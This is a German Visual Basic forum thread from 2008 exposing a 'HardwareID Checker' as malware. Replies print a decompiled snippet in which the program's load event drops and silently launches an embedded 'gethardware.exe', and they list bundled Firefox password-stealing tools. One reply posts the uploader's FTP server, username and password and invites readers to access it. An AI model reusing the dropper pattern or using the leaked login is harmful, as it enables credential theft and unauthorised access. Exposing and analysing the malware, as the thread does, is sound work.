Visual Basic Forum

Visual Basic Forum
für VB6 und VB.NET Programmierer
 
RegistrierenRegistrieren  LoginLogin

Neues Thema eröffnen   Neue Antwort erstellen    Visual Basic Forum Foren-Übersicht -> Konzepte und unfertige Programme
Autor
Nachricht
HoL|FsC
Tutorial Leser
Tutorial Leser

Anmeldedatum: 15.06.2008
Beiträge: 22

HardwareID Checker
Verfasst am: 30.07.2008, 11:03

Wir dulden keine Schadsoftware in unserem Forum!

_________________
 
^^kev####
Überflieger
Überflieger

Anmeldedatum: 01.05.2008
Beiträge: 476
Wohnort: Haan


Verfasst am: 30.07.2008, 13:05

Und was soll der scheiss


Schade das Anubis zuzeit nicht geht -.-'
Und wofür benutzt du ein FileStream?

See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.

************** Exception Text **************
System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:Program Filesgethardware.exe'.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode)
at Hardware_ID.Form1.Form1_Load(Object sender, EventArgs e)
at System.EventHandler.Invoke(Object sender, EventArgs e)
at System.Windows.Forms.Form.OnLoad(EventArgs e)
at System.Windows.Forms.Form.OnCreateControl()
at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
at System.Windows.Forms.Control.CreateControl()
at System.Windows.Forms.Control.WmShowWindow(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.ContainerControl.WndProc(Message& m)
at System.Windows.Forms.Form.WmShowWindow(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Loaded Assemblies **************
mscorlib
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.42 (RTM.050727-4200)
CodeBase: file:///C:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/mscorlib.dll
----------------------------------------
Hardware-ID
Assembly Version: 1.0.0.0
Win32 Version: 1.0.0.0
CodeBase: file:///C:/Dokumente%20und%20Einstellungen/Administrator/Desktop/Hardware-ID.exe
----------------------------------------
Microsoft.VisualBasic
Assembly Version: 8.0.0.0
Win32 Version: 8.0.50727.42 (RTM.050727-4200)
CodeBase: file:///C:/WINDOWS/assembly/GAC_MSIL/Microsoft.VisualBasic/8.0.0.0__b03f5f7f11d50a3a/Microsoft.VisualBasic.dll
----------------------------------------
System
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.42 (RTM.050727-4200)
CodeBase: file:///C:/WINDOWS/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Windows.Forms
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.42 (RTM.050727-4200)
CodeBase: file:///C:/WINDOWS/assembly/GAC_MSIL/System.Windows.Forms/2.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
System.Drawing
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.42 (RTM.050727-4200)
CodeBase: file:///C:/WINDOWS/assembly/GAC_MSIL/System.Drawing/2.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
System.Runtime.Remoting
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.42 (RTM.050727-4200)
CodeBase: file:///C:/WINDOWS/assembly/GAC_MSIL/System.Runtime.Remoting/2.0.0.0__b77a5c561934e089/System.Runtime.Remoting.dll
----------------------------------------

************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.

For example:





When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.

_________________
 
noname
Poster
Poster

Anmeldedatum: 01.05.2008
Beiträge: 131


Verfasst am: 30.07.2008, 13:35

Im Load Event wird eine Datei namens "gethardware.exe" entpackt und gestartet:

Visual Basic: [code]
Using stream As FileStream = New FileStream("C:Program Filesgethardware.exe", FileMode.OpenOrCreate)
stream.Write(Resources.gethardware, 0, Resources.gethardware.Length)
End Using
Interaction.Shell("C:Program Filesgethardware.exe", 2, False, -1)
[/code]

In dieser "gethardware.exe" steht genug drin um zu erschließen für welchen Sinn sie gedacht war.

Ich kenn mich mit dieser Materie nicht aus aber vll sagen euch die Namen ja etwas:
FirePassword.exe
nspr4.dll
nss3.dll
plc4.dll
plds4.dll
softokn3.dll
getname.bat
_________________


 
^^kev####
Überflieger
Überflieger

Anmeldedatum: 01.05.2008
Beiträge: 476
Wohnort: Haan


Verfasst am: 30.07.2008, 13:46


Ja sagen [img]/rolleyes.gif[/img]



Wie gut das man die FTP Daten auslesen kann...


Hier könnt ihr euch austoben:

Server: yourftp.de
User: somaricrew.SC36270
Passwort: golive

Wer hat den PC namen FABIAN-PC? Er hat alle FF PWs auf seinem FTP gehabt... hab sie mal gelöscht wenn du glück hast, dann ist nix passiert Very Happy

_________________
 
Neues Thema eröffnen   Neue Antwort erstellen    Visual Basic Forum Foren-Übersicht -> Konzepte und unfertige Programme

Tags: checker, hardwareid

 
 Verwandte Themen   Aufrufe   Letzter Beitrag 
Keine neuen Beiträge levitra discussion forum 135 04.06.2010, 14:03
Keine neuen Beiträge levitra user forum 97 03.05.2010, 08:42
Keine neuen Beiträge neues Forum 125 02.02.2005, 05:41
Keine neuen Beiträge Das neue Forum ist eröffnet! 233 08.09.2001, 22:13
Keine neuen Beiträge Datenbank von Forum mit Programm verbinden 738 28.08.2008, 16:43
 




[ Time: 0.3164s ][ Queries: 93 (0.0376s) ][ GZIP on - Debug on ]